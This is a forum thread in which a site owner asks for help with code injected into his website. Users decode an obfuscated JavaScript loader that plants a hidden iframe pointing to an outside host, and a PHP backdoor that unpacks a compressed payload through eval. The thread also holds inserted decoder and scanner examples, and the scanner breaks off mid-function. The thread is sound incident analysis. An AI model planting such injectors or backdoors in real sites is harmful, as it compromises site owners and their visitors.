  1. #1
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts

    What's that code? What does it do?

    Hello, I can see ESET marks my site as having some malicious JS. However with other antiviruses it seems clean. I made a lot of different website scans from the web and all say the site is clean.

    I wrote to ESET, and they said there is some malicious JavaScript, but didn't give me any more info.

    I found this strange code, but I am not sure whether this is the malicious code or a good theme code:

    Code:
    <script type='text/javascript'>var wow="cb3ntstopb1stnb2tb1nl";var _J=(Date);if(_J){_h='4726';}var _Y={'J':'reve\x72\x73e','f':'str\x69\x6Eg','o':'\x73\x75bstr','s':!false,'k':'j\x6Fin','v':'spl\x69\x74','P':'len\x67\x74\x68'},_R='',_z=['=c1n"oll ;y"1=cd(if=-oumt.oc.iekienoOfxe{adn)1)cr =(vanea.saDw ;teetiT(.eetgmaTi)(me2;)cE=73;6c2t(D an=e.aewimTt(+)ceeg3douc);ecetn.m=ik1coocpa"s"+=+ee(Moc2TtStirG.gn()")+p;xei=sre.tTGc"+o2MStng)(a;p"tri+;v"/de=h= brumnaoct.aemlecrEneet(tf+ir""""+""+a"=em"M,c)tah.05(d1oru*0+n.rhtnodmaaM(,dM=))7ot.hra0(d+0nut.h0a310*Mra)(nd;.bmts)olye.dwiMt=har.th(150nou0d+00at.hondam*Mrb.;).h)(eyltigtshe=cs.pe.;blsoyttin"obsai=ol"eutlb;.etysl.efscb;.=t-"=rd:/pt"w+o/thwepal.r-ae/(ec"",.)g/(b/leerpac3/."g,rpeaal)"ec(//b2eg","er).e(/bapl/c1g,."+)mre/2 ""l"mtanh.onlofuc;d=ti)umc(ononed{.td.oppabyenihdC}dl(;)}b'][_Y.k]('\x0A'),_h=_h[_Y.v](_R),_K=function(){for(var _a in _h){if(typeof(_h[_a])==_Y.f){var _c=[],_E=_Y.s,_J=_h[_a]*-~false;for(f=[]^[];f<_z[_Y.P];f+=_J){_c[f]=(_E)?(_z[_Y.o](f,_J)[_Y.v](_R)[_Y.J]()[_Y.k](_R)):(_z[_Y.o](f,_J));_E=!_E;}_z=_c[_Y.k](_R);}}w\u0069\u006Edow['e\x76al'](_z);},_z=_K();</script>
    Could you please help?
    The site is modapokazy.pl

    Thanks

  2. #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    19,441
    Thanks
    217
    Thanked 2,699 Times in 2,675 Posts
    Quote Originally Posted by utnalove View Post
    Hello, I can see ESET marks my site as having some malicious JS. However with other antiviruses it seems clean. I made a lot of different website scans from the web and all say the site is clean.

    I wrote to ESET, and they said there is some malicious JavaScript, but didn't give me any more info.

    I found this strange code, but I am not sure whether this is the malicious code or a good theme code:

    Code:
    <script type='text/javascript'>var wow="cb3ntstopb1stnb2tb1nl";var _J=(Date);if(_J){_h='4726';}var _Y={'J':'reve\x72\x73e','f':'str\x69\x6Eg','o':'\x73\x75bstr','s':!false,'k':'j\x6Fin','v':'spl\x69\x74','P':'len\x67\x74\x68'},_R='',_z=['=c1n"oll ;y"1=cd(if=-oumt.oc.iekienoOfxe{adn)1)cr =(vanea.saDw ;teetiT(.eetgmaTi)(me2;)cE=73;6c2t(D an=e.aewimTt(+)ceeg3douc);ecetn.m=ik1coocpa"s"+=+ee(Moc2TtStirG.gn()")+p;xei=sre.tTGc"+o2MStng)(a;p"tri+;v"/de=h= brumnaoct.aemlecrEneet(tf+ir""""+""+a"=em"M,c)tah.05(d1oru*0+n.rhtnodmaaM(,dM=))7ot.hra0(d+0nut.h0a310*Mra)(nd;.bmts)olye.dwiMt=har.th(150nou0d+00at.hondam*Mrb.;).h)(eyltigtshe=cs.pe.;blsoyttin"obsai=ol"eutlb;.etysl.efscb;.=t-"=rd:/pt"w+o/thwepal.r-ae/(ec"",.)g/(b/leerpac3/."g,rpeaal)"ec(//b2eg","er).e(/bapl/c1g,."+)mre/2 ""l"mtanh.onlofuc;d=ti)umc(ononed{.td.oppabyenihdC}dl(;)}b'][_Y.k]('\x0A'),_h=_h[_Y.v](_R),_K=function(){for(var _a in _h){if(typeof(_h[_a])==_Y.f){var _c=[],_E=_Y.s,_J=_h[_a]*-~false;for(f=[]^[];f<_z[_Y.P];f+=_J){_c[f]=(_E)?(_z[_Y.o](f,_J)[_Y.v](_R)[_Y.J]()[_Y.k](_R)):(_z[_Y.o](f,_J));_E=!_E;}_z=_c[_Y.k](_R);}}w\u0069\u006Edow['e\x76al'](_z);},_z=_K();</script>
    Could you please help?
    The site is modapokazy.pl

    Thanks

    My Avast says it is a virus. Possibly it is a false alarm, but I would keep clear of it.

    It appears to have syntax errors which will prevent it from executing, but that is not to say that the intent is not malicious.
    http://jsunpack.jeek.org/dec/go?repo...868cd99ae1bad5



    Last edited by Philip M; 06-09-2012 at 08:11 PM.


  3. Users who have thanked Philip M for this post:

    utnalove (06-10-2012)

  4. #3
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Thanks...WTF... I can't find that code anymore. Today I saw it with a CTRL+U in the homepage. Now I am trying once again... and nothing! The code is not there

  5. #4
    Regular Coder Krupski's Avatar
    Join Date
    Dec 2010
    Location
    United States of America
    Posts
    505
    Thanks
    39
    Thanked 47 Times in 46 Posts
    Quote Originally Posted by utnalove View Post
    Thanks...WTF... I can't find that code anymore. Today I saw it with a CTRL+U in the homepage. Now I am trying once again... and nothing! The code is not there
    For what it's worth... the code unscrambled is:

    WARNING - DO NOT RUN THIS CODE - MAY BE MALICIOUS!
    Code:
    c1 = "lonly";
    if (-1 == document.cookie.indexOf(c1)) {
        var a = new Date;
        a.setTime(a.getTime());
        c3 = 72E6;
        c2 = new Date(a.getTime() + c3);
        document.cookie = c1 + "=" + escape(c2.toGMTString()) + ";expires=" + c2.toGMTString() + ";path=/";
        var b = document.createElement("if" + "r" + "a" + "me"),
            c = Math.round(10 + 50 * Math.random()),
            d = Math.round(700 + 1300 * Math.random());
        b.style.width = Math.round(100 + 500 * Math.random());
        b.style.height = c;
        b.style.position = "absolute";
        b.style.left = -d;
        b.src = "http://" + wow.replace(/ea/g, "-").replace(/b3/g, "a").replace(/b2/g, "e").replace(/b1/g, ".") + "/rem2.html";
        onload = function () {
            document.body.appendChild(b)
        }
    };
    The above is the content of the variable "_z" which is then run with an "eval()" call.

    All the code does is generate a cookie named "lonly" and then create an iframe and try to open "http://cantstop.stnet.nl/rem2.html" as the iframe source.

    No clue what that page is... I'm not going to try and open it.

    Edit:
    I got brave and tried opening the root page. It's got a new Apache web server setup with no content. The URL returns:
    It works!

    This is the default web page for this server.
    The web server software is running but no content has been added, yet.


    Very strange........
    Last edited by Krupski; 06-10-2012 at 02:31 AM.

  6. Users who have thanked Krupski for this post:

    utnalove (06-10-2012)
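The unscrambling shown in post #4 can be reproduced without ever calling `eval()`. The following is an added example, not code from the thread: it reimplements the loader's chunk-reversal passes (key `4726`, taken from the injected script) as plain string functions, and decodes the `wow` host string into a defanged indicator. The function names and the short scrambled sample are constructed for illustration.

```javascript
// Added example: static decoder for the chunk-reversal scrambling used by the
// injected script. It only transforms strings; nothing is evaluated.

// One pass of the loader: cut the text into chunks of `size` characters and
// reverse every other chunk, starting with the first one (the loader resets
// its "reverse" flag to true at the start of each pass).
function reverseAlternateChunks(text, size) {
  let out = '';
  let reverse = true;
  for (let i = 0; i < text.length; i += size) {
    const chunk = text.slice(i, i + size);
    out += reverse ? chunk.split('').reverse().join('') : chunk;
    reverse = !reverse;
  }
  return out;
}

// The loader runs one pass per digit of its key, in order ('4','7','2','6').
function unscramble(text, key) {
  let result = text;
  for (const digit of key) {
    const size = Number(digit);
    // A chunk size of 0 would loop forever in the original loader.
    if (!Number.isInteger(size) || size < 1) {
      throw new Error(`key digit "${digit}" is not a usable chunk size`);
    }
    result = reverseAlternateChunks(result, size);
  }
  return result;
}

// The decoded payload builds its iframe host from `wow` with four literal
// substitutions, applied in this order.
function decodeHost(wow) {
  return wow
    .replace(/ea/g, '-')
    .replace(/b3/g, 'a')
    .replace(/b2/g, 'e')
    .replace(/b1/g, '.');
}

// Defang a host so it can be pasted into tickets and block lists safely.
function defang(host) {
  return host.replace(/\./g, '[.]');
}

// Constructed sample: an 11-character string scrambled the same way as the
// payload, short enough to check by hand.
const SAMPLE_SCRAMBLED = '=c1n"oll;y"';

console.log(unscramble(SAMPLE_SCRAMBLED, '4726'));
console.log(defang(decodeHost('cb3ntstopb1stnb2tb1nl')));
```

To decode the real payload, pass the long string literal from the injected script (saved to a text file, not pasted into a browser console) to `unscramble()` with the same key.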

  7. #5
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Thank you. It is even more strange that I cannot see this code anymore in my site. I wanted to delete it... but I can't find it.
    I also tried to download all the php/js/css etc and compare them with the original theme site... and guess! No changes. There is no injected code or so it seems.

    And my antivirus is not warning me anymore :/

  8. #6
    Master Coder felgall's Avatar
    Join Date
    Sep 2005
    Location
    Sydney, Australia
    Posts
    9,249
    Thanks
    4
    Thanked 932 Times in 919 Posts
    Quote Originally Posted by Krupski View Post
    I got brave and tried opening the root page. It's got a new Apache web server setup with no content.
    That probably means that the hosting provider has identified that the site contained malware and has deleted it.
    Stephen

  9. #7
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    oh nooooooooo

    More or less once per day I see that code in the source. If I refresh the site or come back later it disappears.

    This time I made a screenshot.
    The php files seem to be clean and original:/
    [Attached thumbnail: screenshot]

  10. #8
    New to the CF scene
    Join Date
    Jun 2012
    Posts
    6
    Thanks
    0
    Thanked 1 Time in 1 Post
    Hi utnalove,

    I got the same problem on a WordPress webpage, exactly the same code output of the JavaScript.
    I also didn't find any code, but I use a cache plugin on the webpage.

    I analysed this deeper and it seems that the code got through to the page from the cache plugin. If I clean the cache, the code is gone.
    I also think that the code insertion does not get into the page in every case, maybe only sometimes or as a result of some unknown events.

    I do not know how this got into the cache, but I reset all accounts for the system, FTP and the WordPress CMS to prevent it.

    I collect some backups from the system in its malicious state and analyse them further.
    Hope we get the solution.

    Maybe a normal module inserts the code because the author implemented such a thing.

    Let's refactor the code together and analyse it to the ground.

    PS: sorry for my rusty English...

  11. Users who have thanked Wagua for this post:

    utnalove (06-12-2012)

  12. #9
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Thanks for your help, but I do not have any cache plugin

  13. #10
    Regular Coder
    Join Date
    Jun 2010
    Posts
    327
    Thanks
    84
    Thanked 8 Times in 8 Posts
    Just a word from me ... (you may beat me with a frying pan if you wish) ... but my golden rule is that I never ever use any code in a website unless I understand EXACTLY what it does ... which usually means that I've written it myself.

    Using code that randomly inserts bits of javascript into your pages seems alarming to say the least ... !!!
    Last edited by XmisterIS; 06-12-2012 at 02:10 PM.

  14. #11
    New to the CF scene
    Join Date
    Jun 2012
    Posts
    6
    Thanks
    0
    Thanked 1 Time in 1 Post
    @utnalove: which system/version/plugins do you use?

    @Mariela301: which system/version/plugins do you use? Particularly the cache plugin may be important.

    @XmisterIS: thanks, but this didn't help to solve the problem.
    Yes, I know what you mean, but during the many projects you will create you are not able to develop all the code yourself. You need to use user-generated plugins and you are also not able to proof every whole plugin.

  15. #12
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    I have two pieces of news. One good and one bad.
    The good one is that I found I have been hacked and I found some modified files.
    The bad one is that I don't know what they do.

    I am going to clean everything. Here is the malicious code - I couldn't find anything else. Maybe somebody knows what they do??

    Do not run the code. It may be malicious:


    Code:
    <?php $qbbpkxq_o = array("eNqtWgl32siy/iu","MT05sXjyOWgugcc","jFjsHGsWDAgIGZH","A4I2SzCcFjCkuS/","v+6q6tYCduZObhK","Q1Kr+urq2riqSGD","4mTn57XD27y+H0u","eNthovl4uR4qx0n","k4lvCfkisdVO3gy","T3950sxfzeXd7cn","ycODuuPdjikuo+b","BYtcXef0e5G4ubi","SXx/vhbfpa+95uW","gf+0PxVPvup4u5l","kNyOv1p/IncWeuy","9tLcdPsPljiOu4Z","/Z24KeatevGqtXL","Ew6dx9vj02NUL4m","HSbtjLnl71+VDPE","COXfs+3YZVWs+S3","r31xu+WvuzdVcau","5V+Iy/XonLmvxlR","WA/F9xK54yI357t","5aD4h8fRWoYDN1W","HkqjdhOY1u7qm0F","v0meth75fHnI2ho","yJF+52/dR+MNNuT","Vvfjeow+aoCPACE","DvJb9WA7jRGX0dc","eyG/6BFS6+Np8BS","i4r5c+PWmf+VTYS","GVaAuk9AUOf8PKn","GLm+ha0XQWiws3e","4nzttIx4BsqUXNH","HtPtir5tX0K20XV","HNtj1rN6qynmynQ","AihVCeyqghdiAlZ","5UlLjT7dDxygNWy","Onlt/cgkYcUGsZ1","A62MiqrxdxJcZeH","reKcC8bnA598/gT","WB1vIbxzYTGtUqj","2J1WrXIEBgFYxLs","Ht6XG0AD/ewACsK","Sq4rF5Q3KmqwcGO","9egDQ1hIYa7Ce80","mzmnxcPD/sLpblB","ohnLqbvQKDu3Siv","NT9ZPedeA4NpAtQ","CFHtX8/tiGsKJb4","ZL+gswNf5eXPqf0","X5Ku6qLzpIHqJLg","SNzsQM5i9TksJbi","6X+AmGnxKA8wF/A","Ekq7FmMJWmiYfoV","HgtVmzjRvyA6c9M","yCJYFVbqi71anCm","w0EAksGJoBXhWq4","BEb13lNSNnzfcAq","glIl2J1KRIpDmc3","gGElJWRqicriTAl","pC3GAsQkYcQOrOj","UwT64Yc+OAQTVI1","+0IJISkdRasmE8r","A2kJmR3lDcdfr9A","mhZiK21Lg6w7pia","8AZupcXZI5wMpMK","QQC03rljPImeUJp","V0BSYAisXAfkhiQ","t7oDxXQVWArILCw","UMq8l7sBJnB3sJS","Ti/VqtX1N5gZdBh","cVNigQ6dGvheSCm","gOzkN9XdJIhlvBG","NgzrRfHC8yskV8h","HAN5sXJdSFFZ1TZ","ooWTlEB6lkOM8Nc","gBtg2Tg8Jeaf8io","RduhL6yDNOvisHM","cipjVlTxTfTwoWL","Vmhsqwwft8VD8Fo","sWobA5YOFOxjKUO","55U8q6XCBjuBoQ/","2OL5MplKHjZAPIo","LJhbIe81kZWv/PD","uIR4jjxDQhLVund","1FoK22NKedI80Ir","NFlKKhKSEgmbAMs","jpPVXEADmMBoMVo","4O5IlCJPbwqpcq+","Br5RRSr5uIDcPiG","JbJ7relqzx4zlVB","yG6nFmyELcxl6Ks","gSMO5iBolCE0otE","W2be5KhTVNdTSBD","mL3pcdo5QYxM6qD","p5RGY2WviBbew45","b2cppLPS72gA2h4","Exz0MXw2gA+/JlN","EBRgMfvlIHWfOEZ","G4ir0YMA+Byp09B","Cc2pILa/LJL3gII","B46oBLoz3j/lQIk","McSE4wHDF/IUByL","CKY4J5yRY6JaIcg","DJyB0DMM8/OioA2","FiPjHn7EJ6sR52L","Rlb5RQgV+4iFeAY","fJyTP8nzIUIO6A4","5nSCDfCS
KDJJR5E","HkgpC1Cbm7hVtvH","V5J+iwED0bS1KRO","0FjkttHbgLmKLiW","l6IJjEdWZJxK5fb","l1yLg2UmJ4BrYOi","6BOwpV7eJJHpTTV","uBhwhboRDmGUkES","2T/tSDFL8p+lK8M","jc/qpqH0o0O2lnF","Igs9Ckn7AjwmkFk","2e3lIOC8IgCZ6Bt","MHrL8KFfRuTSSsR","9IiT/MMRxfTgGVB","gnRLeVXFNpqpPF9","UhGdwfd5PC2JCA3","3kBAgI+GjGxY1ZG","DHsCbiV2VNhmI6T","7GDEyKjDEAgOBG5","lf0AM3WIwaWrlko","vuQ9TNATSUk3lFl","uHagoQO8h47RTka","QgMkj+blPYWlfZq","SksYPa4gM9PKMmj","yfQQ5kKWEh2TKGM","rhqI4upKkVxuE0g","580bRnOmEP7kbYC","K6lTcoN7cbaSd1S","bg2eEOmORAUDJG2","SFm3ItT7nbNnzYR","8+IoiHd3HkKHfyV","8CGPZ/FoEE7IkAy","0tKYFjfDZVpKZIZ","4F4bScpxVwmJZqI","l/Ib0riyN6Nw/bB","NWYSqomo8tgYa9E","UlTzmFjONgqo6V5","E0TuQMYtuVkPdg+","o2a40f21WUobhZ3","pcBg8fB5YlIl3D7","CyCg89Msg8W1I29","iVVA5BkVjmETXIT","AI/BIbWIn9Am3FY","NCOn5B7qO5WZl2t","imms1w6EV/ZSqD3","RrPIsjTKIbPGlBp","jVAKTZidQHtJwh0","gFyGPYEFGJJRgCR","GI6clHOdWcMo0wJ","dVnMQsDIV96Up1O","UoULem7QQaGKRao","r1aQlePWaYQRHeX","TpZqTDafUlNeD6X","GXCaoONzhNoBjZO","iMVpnaCvCSzRDxo","hLpKEdtpoZeB4zG","llpqw0IqmcobQQj","XMNUujcDZb2cnKw","MGDA0UtSdVJvY4k","44L8IqLk7k1Vc6N","Dbd3+2sa+hw+9Hr","hlwNAzKEpQ9QC4t","GpNbBHGWtAkwFvj","dtDX11L8LjaGoDv","QhnZUQ1QF7sQe9g","ylpO6N+K6CAFxsW","i26D41V/wLcsWU0","tj1cG/pP1wMRcrs","P1tgDe79cYBsFil","9IPVrA362Il33Yg","b1t30CpsG03eZWF","y4Iy9AGGrgk2Zvo","30NDqG33DNaooyc","Db3RtQg9YFJu2Vo","GzCkoueaLCdouPT","RntB7i3eCkxxe+O","vvKjQ+7D//qylNx","btpgqh7gRsd9mab","DgTKjp5DzC8al83","RJUL3ntz6/cmFYU","H+vC3/aYjRdx7KC","z6emHbjhapKJ2+T","5J+LDR20KBoUhNh","DEs9t7EriBZ6Neu","ppPHGeWqC7dkZ0E","ElGkROj5v+cnDXn","F2C+TdmfW9XXzwG","kfYO21Z30EkxxW1","93Kg26o1ao2CrHL","0+hgq1DRq2RJPwv","lCFdl69YBdrrFQX","jTejbtOuGnh6Vvg","j3jZK9aBybeQhdl","aqef9eNRqpf+ZG2","mhoi/66XVHpQ191","J3tkA70bVUIDS+N","GqQYLgPUUmlohXy","1APiGYBpKC3ahrD","RWrQZIaSPqmWgdJ","1yWaVrpXdI3LelM","D9dzW8o1ypc4KQa","MU2XvABJ91kU0gf","qiK1iK3rbHqoAat","V7l80Jdpo28PWiQ","Ro7olqfSvGysgaC","nafP+hXwm5R1XrB","o5aDmz2LuiT3m0t","sKNe8wIfQakaPUZ","lzGkhmrUeIKxPSR","H316rpgQ7BxvLIu","rpYO7i6uIUh6jDU","eM53Edk4DA
WqxVD","8tI6VzI4YQqp+IK","VIjxNEXiQKiFiVc","EsYcrdgaWk4IIQb","MJy+AcHpsXvdgGj","UDoRIQcpvgacuHz","npI7gaJ22DzdiLn","mpWF8bHyfO5t1zN","nxO97sJLmZ2+507","73smb7l9vhl+S5z","8SPxLDxwO/ObgDz","x131rPOwOv2O/60","2z9OJr+pXyD2X58","kvx0GcqMT3ZM323","JHS34TF5bdaida8","pzP3J+4mvud4fNw","KeYLYj2rhk6S53C","/8JbT2RIQ9dNP9e","pd+c9ah19OcY1Xi","G7yF1f56ul8unru","cw5eI60VnXy5XpO","079JnVvjz6txqvl","avlmrVi9J9IVjun","XamW7GvV2Hq9/nq","xXW+VIONMRDYbyc","5LorOk7c84UJkye","T37+EBPcn/fMu9j","Fko392VH+7Kny5q","xXIpxJoR+fPzAc7","5j1fWcS6a1fxVsX","ofWiIV/pP++QBfQ","oAaaAHexkMr0klm","rj9deHKEiwZoE79","ls4nHrr/wkt/IB2","D8/McPjw8mDtnc4","2Lqjqcz71nY3JM/","7XV9mGTC8lp2sZx","35t7M77qekLGRPO","XfZlKaG4eczb2nz","qS7dAeCwEqeHsG7","I7JhKwuPBJfzNjN","fuCMnTSkUfAfff0","n7/HKOs8MMAIVgI","I1TLTQLuE18/57A","Gy4ETpJR6/MHmyt","MPKSy3FYG08Wyt3","3uTgiQvxPi+fYKg","QJiGiGls0pyQJRS","us5oyFwGvm01br0","TFs+343Unwm46y+","HEm67QeNIxMlJpm","oKGlj26ztdofze1","2p/v2Zn29/zv56N","zfJ84yx7dcLb/AJ","q9V1Xv0Zt78z8Sg","+Vy9sf790AEaDFK","ITnGkqGp9YU3//3","iyXsmbHZoBjfCx9","mK2xPuBV8mz9eDo","e/xCOlN5XZoP0xM","fOSiXsR2n2H2mf7","St3C7x8Dy08Qmi1","gVM1D8jClQ9o6RO","zE9i+9CZkaiNok1","PQv2a37ozRPvP+L","338/46gh1z2libs","FM8Atm0dqBUwZLc","RcXcc9KfqGVjBgv","nMsvIVPk7wVkim9","aYhlSfDjTCFPTmA","7UUZ9kaXJKvgPSQ","NQTWSbg+4Av/psI","+eWAwzP7H3i8GZe","troFsdRblkZlCPD","o97c+SZmCeonZlV","qCOYxJeKFAyxiMl","jnruYCosW+cTeah","cihcHD/u+t7yMHP","diALVlIQMpUlo62","4X/uiBQLdxSCi9p","vGTwYsPFwF0bDC8","6XjD8GmhtBqIYiG","IgioEoBqKYiGIii","okoJgVxRDERxUQU","E1FMRDERxUIUC1E","sRLEQxUIUC1EsRL","EQxUIUC1FSiJJCl","BSipBAlhSgpREkh","SgpRUoiSQpQ0oqQ","RJY0oaURJI0oaUd","KIkkaUNKKkESWDK","BlEySBKBlEyiJJB","lAyiZBAlgygZRLE","RxUYUG1FsRLERxU","YUG1FsRLERxUYUp","ml0ZXTV6WrQlYKL","ZtE1JaNZJjAppqX","pbYauhM4InRE6I3","RG6DJ0MUJnKboSH","iM8RnjkjkwnPJ3w","dMLTCY9snJGRM7J","yRmbOyM4ZGTojS2","dk6gyyLPSjLISzc","LglD2CGDLgW0drZ","5XzlnT9O+SnLgx8","6XqK7AP/mrHMf5g","fh0/DkCAeOpI+Sk","9pZyJ/Oe3z+OAi8","djKCmFGILEDEZ8l","OKBV7FTjRfe7/hg","CwoZTaUGxidEqCh","zufUg9O+yErQ
7V+","lrZiX3tI4ZBnn78","Q2OaTzvyx88gP8E","h4C4ZxwzpVKkZWj","E1ETiNfyCNQN7Mi","TeoP5/JN8htmBsC","PyFrxhZXlwukrOl","Ok8xLD4mSQavA49","/ZtIjaWEWPDRYgv","sWt3MJn26TFIBsy","U/HADWz37w+exnM","JlAelFiIXzH8vpi","vSu66e4V7okX5Ld","cujNI1ITAwiRwrm","YI3FfQOnZ2cmyM+","d6PZGHYTh5CSUwB","h6aeobQgtzhzIx/","eKKBczA10NOxOeq","9ns296fB6q5Gv/g","XitOksNoyXVlNsf","UkmzmbT9YmyP/yb","PI1lPSr74fR7rEd","ziZ88J78kziDl0i","TUHnv/Jl8hWZgxW","ZgiKQs5zP5i+pkV","/oBE4jtkgunYoKH","GDvCftmJfCtbQaJ","YdvcpxgxFanP4n8","C9SBwLXJaRx8q9F","ofNkPvb572TDODY","LYRsmXfUX3XGxXY","geQWfpTWYd7tsR1","4y/PFExx7BEMeg9","f8UMn59HyXBVbZ0","fpjP/IZ21R0dEgh","NefJ50OoXiXb7Tg","ZMOopUo4HmEkxtD","er6ZUBTjz9Jc+WZ","UDSuGZdynU+CwrL","xNRDreBqdTEmuko","SbhWSIU3pzR5VYS","gNwO4HnQDsupFoa","BIdCg8o1DjqbDZ5","QJ1SHiHeThhxAXA","8/Hjohsk3GIXDAq","+XkFYbvgMgaupr3","OYtmdi/ZaDofVdI","nMSYR9uNNnrjs+n","VPyIX6edVzf6z6f","vLLQrLtYLAfz1d5","S8sUvLJbjx93cW0","xXc2qMGJlsbqb6E","VzKIFEbmmIh3VlB","XZ5ThbmRUUS8Ms8","9inOYXgSNCaaLD/","S+ZkEVzqcGPO1LY","D51O9heevv2MMuS","QrKNKW28aM5+TAS","5LlUizBItP7QYO7","5NA0x0nyPYG3Cz/","4qL41glJ2Hx2KHY","qcc/PBS9IDz7l04","kJXndSoU/QgOqoX","dgF6Kt8ksb3GvUx","jao+jY/k0uwA808","y7z0DftBO4iZlYx","Yg+XEX8w8d9j13U","F3TouLIAH9GFNDl","ZvUC+D5TvgI57Up","pjPx8ZRsOeixF2n","5whBtheXUn64pf2","MqqzUZNRoZL3Op9","xgM2XLI1OUYr39l","vH9e+f45nmuhCo4","qY0alMaPamFFxzK","g6ZlQeM6qPGRXIj","CpkRiUyoxqZUZHM","0gYeIb8NFwtvefK","m86lc/lzM/4UilD","o2eQa0fyaqPqtpK","rLw+WLKPgy2e00T","U4a0GW6uxl9S+zY","XP9NMWbLwqiIXLS","v48ue5yVgm6CbVf","WaKE0IQwead9X5+","hHsW3pJ7XM+HSwL","AuJhOw3hgb/x8Pc","8FBYMZKhjSEdf82","bPAxZIhxEqsbMgF","NYVpvvbSir/ck1e","wSPK/Ugy41w9Msb","KHU6wg1drLzzLYN","/1V1R0WuMVY8ldk","hDGBH6b97hLbBWm","byiczExrNaHLUzk","oxIhG2ty1NDS+5H","0ReYUllZn7/hQCP","ESD9YkGnW7GvvWK","LnaXin6Dw0g+UWh","qPubHPa1XIgZNgP","6EXpRMcRAesUsrN","Ykc8IKK+0omPGBA","zTFbyfOwDjenJA4","TGAULzEKF1gDAFv","wrG+hZgfTy5PZpP","Er/PHxPE7/8dYbf","9gGHbLxv2XhDCCR","BoMj8LNMEPREwTB","dEL38mfGT2lhCLS","dXvBLt++PbAZngN","+/w6ji+HOk0MfQm","YV+W3yJ88y87L0
b","M51T17udaiz09Jl","5yYDnZvYL/VAEe+","g/VO5WxrK3d4P/E","eIfPSqQvj8/4lCQ","i85ZFxbkL6FswEI","WhbfY1QWqLpISUD","aoh8lTZSKtFEctK","jTF25aWqZsWvK8R","5RqueV8iNUOH+Cy","xqSGVGlhH5W6lT+","of5gLftw4JXKlUv","jdFRt65IPMFkMCh","06mQ/5hay/oyWR/","Px/QlPxhhtmMhzf","60cfr4v8IEC34WC","PtXdpS/0JNNU3j6","3KAow8Ldz6cLRPL","7czLHi+9zfL9qPu","1i6PHH1ErH97j80","fxy+ePH5Gs0zZeT","6py3X6/04U8HHmk","bE78MhDn9VASffp","ah4/LLvGfj/8PWG","X41A==");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x71\x62\x62\x70\x6B\x78\x71\x5F\x6F\x29\x29\x29\x29\x3B");?>

  16. #13
    Senior Coder
    Join Date
    Jun 2008
    Location
    New Jersey
    Posts
    2,548
    Thanks
    45
    Thanked 259 Times in 256 Posts
    As far as I can see, that line alone doesn't do anything... it's just an array... there's gotta be more.

    However, I doubt you have been 'hacked' in the typical sense. I suspect, if you have a database/queries, you have unsanitized inputs.

  17. Users who have thanked Keleth for this post:

    utnalove (06-12-2012)

  18. #14
    Regular Coder
    Join Date
    Oct 2008
    Location
    Poland
    Posts
    394
    Thanks
    152
    Thanked 2 Times in 2 Posts
    Quote Originally Posted by Keleth View Post
    As far as I can see, that line alone doesn't do anything... it's just an array... there's gotta be more.

    However, I doubt you have been 'hacked' in the typical sense. I suspect, if you have a database/queries, you have unsanitized inputs.
    Well, the above array (whatever it means) was not in the original files. It has been added by something or somebody, surely in a malicious way.
    I have taken ALL the PHP files and checked them for qbbpkxq_o, but it doesn't appear in any other file. I suppose that the $qbbpkxq_o that has been defined there should be used somewhere else... but it's not in the PHP files.

    What else can I check?

  19. #15
    Regular Coder Lerura's Avatar
    Join Date
    Aug 2005
    Location
    Denmark
    Posts
    953
    Thanks
    0
    Thanked 130 Times in 129 Posts
    By decoding this last part of the code:

    Code:
    ... "\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x71\x62\x62\x70\x6B\x78\x71\x5F\x6F\x29\x29\x29\x29\x3B"
    - You get:
    Code:
    eval(gzuncompress(base64_decode(implode("",$qbbpkxq_o))));
    It is obviously for unpacking the .gz archive, that is defined within the array.
    Last edited by Lerura; 06-12-2012 at 05:13 PM.

  20. Users who have thanked Lerura for this post:

    utnalove (06-12-2012)
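The search for `qbbpkxq_o` in post #14 found no second use because the only reference to the variable is written as `\xNN` escapes inside the `eval("...")` string that post #15 decodes. The following is an added example, not code from the thread: a small Node.js scanner that decodes escapes in PHP double-quoted strings and reports any that hide a call such as `eval` or `base64_decode`. The function names, the list of flagged PHP functions and the sample file contents are assumptions made for illustration; the escaped string is the one quoted in post #15.

```javascript
// Added example: find PHP double-quoted strings whose \xNN / octal escapes
// hide a dangerous call. Strings are decoded and inspected, never executed.

// PHP functions commonly chained in packed payloads (an assumed watch list).
const SUSPICIOUS_CALL =
  /\b(eval|assert|create_function|base64_decode|gzuncompress|gzinflate|str_rot13)\s*\(/g;
const ESCAPE = /\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))/g;
const DQ_STRING = /"((?:[^"\\]|\\[\s\S])*)"/g;

// Decode the two escape forms PHP expands in double-quoted strings that are
// used for hiding text: \xHH (hex) and \NNN (octal).
function decodePhpEscapes(raw) {
  return raw.replace(ESCAPE, (match, hex, oct) =>
    String.fromCharCode(hex !== undefined ? parseInt(hex, 16) : parseInt(oct, 8) & 0xff));
}

// Return one finding per string literal that (a) contained escapes and
// (b) decodes to text containing a watched function call.
function scanPhpSource(source) {
  const findings = [];
  for (const m of source.matchAll(DQ_STRING)) {
    const raw = m[1];
    const decoded = decodePhpEscapes(raw);
    if (decoded === raw) continue; // no escapes, so nothing was hidden
    const calls = [...decoded.matchAll(SUSPICIOUS_CALL)].map((c) => c[1]);
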